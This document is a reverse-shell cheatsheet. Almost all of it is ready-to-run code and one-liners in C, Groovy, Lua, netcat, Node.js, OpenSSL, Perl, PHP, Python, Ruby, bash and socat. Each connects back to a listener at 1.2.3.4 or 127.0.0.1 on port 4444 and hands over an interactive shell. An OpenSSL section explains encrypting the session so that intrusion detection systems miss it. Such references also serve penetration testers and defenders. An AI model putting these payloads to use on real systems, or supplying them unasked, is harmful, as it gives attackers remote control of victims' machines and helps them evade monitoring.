UNIX Reverse Shells Cheatsheet
Table of contents
Reverse shells
C
#include <stdio.h>
#include <unistd.h>
#include <arpa/inet.h>
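#define REV_IP "127.0.0.1"
#define REV_PORT 4444

/*
 * Connect back to REV_IP:REV_PORT and replace this process with /bin/sh whose
 * stdin/stdout/stderr are the connected socket. Returns 1 on any failure; on
 * success execve() never returns.
 */
int main(int argc, char *argv[]) {
    (void)argc;
    (void)argv;

    /* Zero-initialise so sin_zero/padding are not left indeterminate. */
    struct sockaddr_in sa = {0};
    sa.sin_family = AF_INET;
    sa.sin_port = htons(REV_PORT);
    /* inet_pton() reports a malformed address; inet_addr()'s INADDR_NONE
     * doubles as a valid broadcast address and cannot be checked reliably. */
    if (inet_pton(AF_INET, REV_IP, &sa.sin_addr) != 1) {
        return 1;
    }

    int s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) {
        return 1;
    }
    /* Without this check a failed connect() leaves s unusable, the dup2()
     * calls fail silently and a plain local shell is spawned on the caller's
     * own terminal instead of on the socket. */
    if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
        return 1;
    }

    dup2(s, 0);
    dup2(s, 1);
    dup2(s, 2);

    /* Give the shell a real argv/envp: passing NULL for either is a
     * non-portable Linux extension. */
    char *const sh_argv[] = {"/bin/sh", NULL};
    char *const sh_envp[] = {NULL};
    execve("/bin/sh", sh_argv, sh_envp);
    /* Only reached if execve() failed. */
    return 1;
}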
One-liner in a shell to create and compile the C reverse shell:
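# Same program as above, generated with printf. The C text is a single-quoted
# format string with %s placeholders, so IP and PORT are passed as printf
# arguments instead of being spliced into the format (no breakage on '%' or
# shell metacharacters). The generated code checks inet_pton/socket/connect
# so a failed connection does not spawn a local shell on the caller's terminal.
IP="127.0.0.1"; PORT=4444; printf '#include <stdio.h>\n#include <unistd.h>\n#include <arpa/inet.h>\n\nint main(void){\n\tstruct sockaddr_in sa = {0};\n\tsa.sin_family=AF_INET;\n\tsa.sin_port=htons(%s);\n\tif(inet_pton(AF_INET,"%s",&sa.sin_addr)!=1) return 1;\n\tint s=socket(AF_INET,SOCK_STREAM,0);\n\tif(s<0||connect(s,(struct sockaddr *)&sa,sizeof(sa))<0) return 1;\n\tdup2(s,0);\n\tdup2(s,1);\n\tdup2(s,2);\n\tchar *const a[]={"/bin/sh",NULL};\n\tchar *const e[]={NULL};\n\texecve("/bin/sh",a,e);\n\treturn 1;\n}\n' "$PORT" "$IP" > rev.c && gcc -Wall rev.c -o rev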
Java (Groovy syntax)
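// Groovy, not plain Java: the untyped assignments and `as String[]` need the
// Groovy runtime. Single-quoted Groovy strings are not interpolated, so the
// shell's $line needs no escaping.
// `read -r` keeps backslashes in the received line intact, and `eval` runs the
// line with full shell syntax (pipes, &&, quoting) instead of the bare
// word-splitting of `$line`, which cannot execute anything but a simple command.
r = Runtime.getRuntime()
p = r.exec(['/bin/bash', '-c', 'exec 5<>/dev/tcp/1.2.3.4/4444;cat <&5 | while read -r line; do eval "$line" 2>&5 >&5; done'] as String[])
p.waitFor()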
Lua
In a Lua script (requires the LuaSocket module):
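-- Requires LuaSocket. Bind the module locally: LuaSocket 3.x no longer
-- creates a global `socket`, so the bare require() form breaks there.
local socket = require('socket')
local t = socket.tcp()
-- assert() surfaces a refused/unreachable listener instead of going on to
-- spawn a shell that is attached to nothing.
assert(t:connect('1.2.3.4', 4444))
-- NOTE: this relies on the new TCP socket having landed on fd 3 (the lowest
-- free descriptor in a fresh interpreter); it does not hold if other files
-- were opened first.
os.execute('/bin/sh -i <&3 >&3 2>&3')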
One-liner from a shell:
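# Same as the script form: local binding of the LuaSocket module, connect()
# result checked, and the shell still assumes the socket is fd 3.
lua -e "local socket=require('socket');local t=socket.tcp();assert(t:connect('1.2.3.4',4444));os.execute('/bin/sh -i <&3 >&3 2>&3')"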
Netcat
Netcat traditional (supports -e):
# -e hands the connected socket to the given program as its stdin/stdout.
# The option only exists in netcat-traditional style builds; other nc builds
# lack it, which is what the FIFO variant below is for.
nc -e /bin/sh 1.2.3.4 4444
Netcat without the -e option:
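# rm -f first: mkfifo refuses to overwrite a FIFO left over from a previous run.
# -m 600 keeps other local users from reading/writing the FIFO in world-writable /tmp.
# nc reads the attacker's input from the FIFO; the shell's output goes back
# through tee, which also echoes the session to the local stdout of the caller.
rm -f /tmp/p; mkfifo -m 600 /tmp/p; nc 1.2.3.4 4444 0</tmp/p | /bin/sh -i 2>&1 | tee /tmp/p; rm -f /tmp/p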
Node.js
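// exec() runs the command line through /bin/sh, and it is that shell - not the
// inner `bash -i` - that performs the redirections, including opening
// /dev/tcp/... . With dash as /bin/sh the payload fails (`>&` followed by a path
// is rejected and /dev/tcp is not supported), so force bash as the shell.
require('child_process').exec('bash -i >& /dev/tcp/1.2.3.4/4444 0>&1', { shell: '/bin/bash' });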
OpenSSL
Encrypted reverse shell
An encrypted reverse shell can help avoid automatic detection by network security monitoring tools such as Intrusion Detection Systems (IDS), because the session content is no longer visible in clear text; the connection itself (a TLS handshake to your listener) remains observable. To create one, generate a TLS certificate and start a TLS listener on your attacking machine, then run the reverse shell payload on the target machine.
- Generate a self-signed TLS certificate:
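# -subj supplies the certificate subject so the command runs without the
# interactive DN prompts; -nodes leaves the key unencrypted so s_server can
# load it without a passphrase.
openssl req -x509 -quiet -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes -subj "/CN=localhost"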
- Start a TLS listener on your attacking machine using openssl:
# TLS listener on port 4444 using the certificate and key generated above;
# -quiet suppresses the per-connection session output.
openssl s_server -port 4444 -cert cert.pem -key key.pem -quiet
- Run the payload on the target machine using openssl:
Short payload:
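# rm -f first: mkfifo fails if /tmp/s already exists; -m 600 stops other local
# users from touching the FIFO. s_client does not verify the listener's
# certificate here, so the TLS hides the content but does not authenticate
# the far end.
rm -f /tmp/s; mkfifo -m 600 /tmp/s; /bin/sh -i </tmp/s 2>&1 | openssl s_client -quiet -connect 1.2.3.4:4444 >/tmp/s 2>/dev/null; rm -f /tmp/s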
Detailed payload:
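# The FIFO carries the attacker's input (s_client output) to the shell; the
# shell's output is piped into s_client. Remove any stale FIFO first, and
# create it with mode 600 so other local users cannot read or write it.
rm -f /tmp/pipesocket
mkfifo -m 600 /tmp/pipesocket
/bin/sh -i < /tmp/pipesocket 2>&1 \
| openssl s_client -quiet -connect 1.2.3.4:4444 > /tmp/pipesocket 2>/dev/null
# Original read "rm/tmp/pipesocket" (missing space): the command was not found
# and the FIFO was never cleaned up.
rm -f /tmp/pipesocket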
Perl
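use Socket;    # original line lacked the ';' -> syntax error on the next statement
use strict;
use warnings;

# Connect back to $ip:$port, point STDIN/STDOUT/STDERR at the socket and
# replace perl with an interactive shell. Silently exits if connect() fails.
my $ip   = "1.2.3.4";
my $port = 4444;
socket(S, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or exit 1;
if (connect(S, sockaddr_in($port, inet_aton($ip)))) {
    open(STDIN,  ">&S");
    open(STDOUT, ">&S");
    open(STDERR, ">&S");
    exec("/bin/sh -i");
}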
One-liner from a shell:
# Same flow as the script: socket, connect, dup the three standard streams onto
# the socket, exec an interactive shell.
perl -e 'use Socket;my $host="1.2.3.4";my $port=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($port,inet_aton($host)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");}'
PHP
In a PHP file:
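// fsockopen() returns false when the connection fails; stop rather than run
// a shell that is attached to nothing.
$sock = fsockopen("1.2.3.4", 4444);
if ($sock === false) {
    exit(1);
}
// Hand the socket stream to the shell directly as fd 0/1/2. The original
// exec("/bin/sh -i <&3 >&3 2>&3") assumed the socket had landed on fd 3, which
// only holds when no other descriptor was opened first.
proc_open("/bin/sh -i", array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);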
One-liner from a shell:
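# Same as the file form: checked fsockopen() and proc_open() with the socket as
# fd 0/1/2, so no assumption that the socket is fd 3.
php -r '$sock=fsockopen("1.2.3.4",4444);if($sock===false)exit(1);proc_open("/bin/sh -i",array(0=>$sock,1=>$sock,2=>$sock),$pipes);'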
Python
Using the subprocess module
import socket, subprocess, os
# Connect back to the listener, then make the socket the standard streams
# (fds 0-2) so the spawned shell inherits it for stdin, stdout and stderr.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("1.2.3.4", 4444))
for fd in (0, 1, 2):
    os.dup2(s.fileno(), fd)
p = subprocess.call(["/bin/sh", "-i"])
One-liner from a shell:
# Python 2 one-liner: connect, dup the socket onto fds 0-2, run an interactive shell.
python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];subprocess.call(["/bin/sh","-i"])'
Using the pty module
import pty, socket, os
# Connect back, place the socket on fds 0-2, then spawn the shell under a
# pseudo-terminal so it behaves like an interactive session.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("1.2.3.4", 4444))
for fd in (0, 1, 2):
    os.dup2(s.fileno(), fd)
pty.spawn("/bin/sh")
One-liner from a shell:
# One-liner form of the pty variant: connect, dup onto fds 0-2, spawn /bin/sh in a pty.
python -c 'import pty,socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
Ruby
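# The file form needs the socket library explicitly (the one-liner gets it
# from -rsocket). The original second line ended with a stray "'" that made
# the script a syntax error.
require 'socket'
# Connect back and hand the socket's fd to a shell as stdin/stdout/stderr.
f = TCPSocket.open("1.2.3.4", 4444).to_i
exec format("/bin/sh -i <&%d >&%d 2>&%d", f, f, f)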
One-liner from a shell:
# -rsocket loads the socket library; the fd number is interpolated into the
# redirections so the shell talks to the socket on all three streams.
ruby -rsocket -e 'f=TCPSocket.open("1.2.3.4",4444).to_i;exec "/bin/sh -i <&#{f} >&#{f} 2>&#{f}"'
Shell
Bash shell with /dev/tcp
# Same as "bash -i >& /dev/tcp/... 0>&1" with the ">&" shorthand expanded.
# The redirections (including opening /dev/tcp/...) are performed by the shell
# that runs this line, so that shell itself must be bash, not just the inner
# "bash -i".
bash -i >/dev/tcp/1.2.3.4/4444 2>&1 0>&1
Shell with a named pipe (FIFO) and netcat
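# rm -f: no error noise when /tmp/f does not exist yet; mkfifo -m 600 keeps the
# FIFO private to this user. nc writes the attacker's input into the FIFO,
# cat feeds it to the shell, and the shell's output goes back out through nc.
rm -f /tmp/f; mkfifo -m 600 /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 1.2.3.4 4444 >/tmp/f; rm -f /tmp/f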
Socat
# socat address keywords are case-insensitive. pty allocates a pseudo-terminal
# for the shell and stderr sends its errors over the same connection; the
# trailing & keeps the calling shell usable.
socat TCP:1.2.3.4:4444 EXEC:'bash -i',pty,stderr,setsid,sigint,sane &